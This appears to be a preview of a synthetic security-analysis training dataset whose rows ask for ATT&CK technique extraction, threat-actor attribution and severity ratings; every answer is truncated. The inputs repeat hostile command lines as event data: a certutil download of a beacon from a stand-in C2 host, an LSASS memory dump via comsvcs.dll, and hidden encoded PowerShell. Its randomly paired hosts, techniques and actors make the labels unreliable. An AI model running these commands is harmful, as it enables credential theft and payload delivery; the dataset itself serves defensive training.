messages
listlengths
2
2
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Windows 11 system (AZURE-VM-88PKJIV1CQ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "Sev...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: Fileless, TLS, LOLBin\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1531 using fileless technique.\nProcess: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2239 C:\\temp\\lsass.dmp full\nData Source: Windows Security Log...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Windows Server 2022 system (EC2-INST-VUTAKHNJLJ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Execution", "role": "user" }, { ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1484.001 using LOLBin technique.\nProcess: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2156 C:\\temp\\lsass.dmp full\nData Source: Windows Security Lo...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: TLS, JA3 Spoof, Base64\nProcess: certutil.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2332 C:\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: LOLBin, Base64, JA3 Spoof\nProcess: certutil.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 1091 C:\\temp\\ls...", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Amazon Linux 2 system (WIN-FIN-SRV-SX7NQ6BUOI)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Credential Access, Collection"...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1531 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Windows Security...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1531 using fileless technique.\nProcess: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3179 C:\\temp\\lsass.dmp full\nData Source: Windows ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1546.003 using cloud-native technique.\nProcess: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: P...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Amazon Linux 2 system (IAM-ROLE-3984RE1J9M)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact, Defense Evasion", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Ubuntu 22.04 system (EC2-INST-55VII89PDM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: Fileless, LOLBin, JA3 Spoof\nProcess: rundll32.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...", ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1566.001 using LOLBin technique.\nProcess: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: CloudTrail (...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1566.001 using fileless technique.\nProcess: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 894 C:\\temp\\lsass.dmp full\nData Source: Sysmon (DS0024)"...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1059.001 using fileless technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Network Connect...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1059.001 using fileless technique.\nProcess: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Sysmon (DS0...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1546.003 using LOLBin technique.\nProcess: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3189 C:\\temp\\lsass.dmp full\nData Source: CloudTrail...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Lapsus$] performed T1021.006 using LOLBin technique.\nProcess: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Azure AD Sign-in Logs"...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1484.001 using encrypted C2 technique.\nProcess: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3865 C:\\temp\\lsass.dmp full\nData Source: Net...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1003.001 using cloud-native technique.\nProcess: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 936 C:\\temp\\lsass.dmp full\nData Source: Windows Secur...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: TLS, WMI, Fileless\nProcess: bitsadmin.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3716 C:\\temp\\ls...", "ro...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Windows 11 system (AZURE-VM-EG36CD6833)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control", "role": "user" }, { "content":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Windows 11 system (AZURE-VM-BM8P2EEXVZ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact, Reconnaissance", "role": "user" }, { "con...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1021.006 using cloud-native technique.\nProcess: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Sou...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1071.001 using fileless technique.\nProcess: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Azure A...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1098.004 using encrypted C2 technique.\nProcess: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source:...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1531 using fileless technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: PowerSh...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: Fileless, TLS, WMI\nProcess: powershell.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IChOZX...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1098.004 using encrypted C2 technique.\nProcess: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: PowerShell L...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Windows 11 system (APP-WEB-0SAAV6YNXN)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Lateral Movement, Privilege Escalation", ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1098.004 using cloud-native technique.\nProcess: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3986 C:\\temp\\lsass.dmp full\nData Sourc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: Fileless, LOLBin, Base64\nProcess: mshta.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAAL...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: Base64, JA3 Spoof, WMI\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://m...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: TLS, WMI, Fileless\nProcess: mshta.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2J..."...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Ubuntu 22.04 system (AZURE-VM-OD5BEX3Z69)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Collection", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Windows Server 2022 system (AZURE-VM-4VSKE48H7G)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, {...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: JA3 Spoof, Base64, Fileless\nProcess: cmstp.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1098.004 using fileless technique.\nProcess: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Network C...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1059.001 using encrypted C2 technique.\nProcess: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1857 C:\\temp\\lsass.dmp full\nData Source: PowerS...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1484.001 using fileless technique.\nProcess: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Az...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: Fileless, JA3 Spoof, WMI\nProcess: wmic.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1021.006 using fileless technique.\nProcess: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Sysmon (DS0024)...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1546.003 using cloud-native technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows Server 2022 system (APP-WEB-9EZX76SNG4)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Persistence, Credential Access", ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1071.001 using encrypted C2 technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Sysmon (DS0024)", ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1003.001 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source:...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1570 using cloud-native technique.\nProcess: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Windo...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1098.004 using cloud-native technique.\nProcess: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Windows Secu...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1071.001 using encrypted C2 technique.\nProcess: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3987 C:\\temp\\lsass.dmp full\nData Source: CloudTrail (...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1546.003 using LOLBin technique.\nProcess: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Network C...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1546.003 using LOLBin technique.\nProcess: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: PowerShell L...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1059.001 using LOLBin technique.\nProcess: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3352 C:\\temp\\lsass.dmp full\nData Source: Azure A...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: Fileless, LOLBin, Base64\nProcess: cmstp.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IChOZXctT...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: LOLBin, JA3 Spoof, TLS\nProcess: rundll32.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....",...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1484.001 using encrypted C2 technique.\nProcess: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source:...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Windows 11 system (APP-WEB-492JHGSPRC)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery, Defense Evasion, Initial Access", "rol...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1059.001 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2267 C:\\temp\\lsass.dmp full\nData Source:...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Ubuntu 22.04 system (AZURE-VM-X0NPXKS8HI)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1546.003 using encrypted C2 technique.\nProcess: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3803 C:\\temp\\lsass.dmp full\nData Source: Powe...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows Server 2022 system (WIN-FIN-SRV-5Z3WKYLCA0)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact, Discovery", "role": "user" }, { ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1003.001 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1546.003 using encrypted C2 technique.\nProcess: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: P...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: LOLBin, Base64, JA3 Spoof\nProcess: certutil.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: JA3 Spoof, TLS, Fileless\nProcess: certutil.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 1329 C:\\temp\\ls...", "role":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: WMI, Fileless, Base64\nProcess: rundll32.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2J...", "role": "user...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1071.001 using LOLBin technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Azure...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: Fileless, WMI, Base64\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2221 C:\\temp\\ls...", "role": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: Fileless, LOLBin, Base64\nProcess: cmstp.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: LOLBin, Base64, Fileless\nProcess: wmic.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2J...", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Windows Server 2022 system (APP-WEB-B9JP48720M)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Command and Control", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Ubuntu 22.04 system (IAM-ROLE-JAMCRMMTV2)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Execution, Exfiltration", "role": "use...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: LOLBin, WMI, Base64\nProcess: certutil.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3981 C:\\temp\\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Windows 11 system (IAM-ROLE-TNS0CVKPKU)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Exfiltration", "role": "user" }, { "c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1003.001 - OS Credential Dumping: LSASS Memory\nEvasion Methods: JA3 Spoof, WMI, TLS\nProcess: certutil.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....", "rol...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Lapsus$] performed T1546.003 using LOLBin technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: PowerShell...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Windows 11 system (DB-ORACLE-52RVVYZCCX)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: TLS, JA3 Spoof, LOLBin\nProcess: powershell.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: JA3 Spoof, LOLBin, Base64\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://ma...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1484.001 using cloud-native technique.\nProcess: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3532 C:\\temp\\lsass.dmp full\nData Source: P...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: LOLBin, JA3 Spoof, Fileless\nProcess: powershell.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1071.001 using cloud-native technique.\nProcess: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 897 C:\\temp\\lsass.dmp full\nData Source: Netw...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1098.004 using cloud-native technique.\nProcess: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1098.004 using LOLBin technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Sysmon (DS0024...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: LOLBin, JA3 Spoof, TLS\nProcess: powershell.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Ubuntu 22.04 system (AZURE-VM-0KXYPYE8O3)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access, Collection, Reconnaissance", "ro...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Windows Server 2022 system (IAM-ROLE-OCATLAXC7V)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Execution", "role": "user...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1098.004 - SSH Authorized Keys\nEvasion Methods: Base64, WMI, LOLBin\nProcess: wmic.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3521 C:\\temp\\ls...", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: LOLBin, WMI, JA3 Spoof\nProcess: mshta.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Windows Server 2022 system (IAM-ROLE-QJHJKROLRP)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Persistence", "role": "user" },...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1484.001 using cloud-native technique.\nProcess: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData S...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1071.001 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Ubuntu 22.04 system (APP-WEB-S64IUMF3DR)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Command and Control", "role": "user" }, {...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: TLS, WMI, LOLBin\nProcess: powershell.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....", "role": "user" }, { "c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Ubuntu 22.04 system (DB-ORACLE-KNAQZC6ITV)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Privilege Escalation, Defense Evasio...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Ubuntu 22.04 system (AZURE-VM-44T2WV2NK4)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1570 using fileless technique.\nProcess: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Azure AD S...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: Base64, TLS, WMI\nProcess: certutil.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 1026 C:\\temp\\ls....
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Ubuntu 22.04 system (AZURE-VM-NWX15DOWCW)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Privilege Escalation, Credential Access", ...